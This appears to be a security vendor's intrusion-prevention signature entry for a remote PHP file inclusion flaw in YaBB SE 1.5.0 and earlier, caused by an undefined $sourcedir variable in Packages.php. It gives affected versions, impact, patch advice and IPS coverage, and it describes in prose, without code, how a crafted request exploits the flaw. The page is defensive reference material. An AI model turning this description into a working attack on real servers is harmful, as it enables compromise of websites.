YaBB.SE.Packages.php.Remote.File.Inclusion

description-logoDescription

It indicates a possible exploit of PHP code inclusion vulnerability in YaBB software package.


YaBB (Yet Another Bulletin Board) is an open-source bulletin board system for any system. A vulnerability is reported in it that may allow an attacker to execute arbitrary PHP code on the vulnerable system. This is due to vulnerability in Packages.php script which has undefined variable $sourcedir. An remote attacker may send specially craft a URL request to Packages.php script directly that specifies the Packer.php script from a remote system as a parameter, which would allow the attacker to execute code on the vulnerable Web server.

affected-products-logoAffected Products

YaBB SE 1.5 .0 and earlier versions.

Impact logoImpact

Compromise of the affected system.

recomended-action-logoRecommended Actions

Apply vendor supplied patches.

Telemetry logoTelemetry

Coverage

IPS (Regular DB)
IPS (Extended DB)

References

1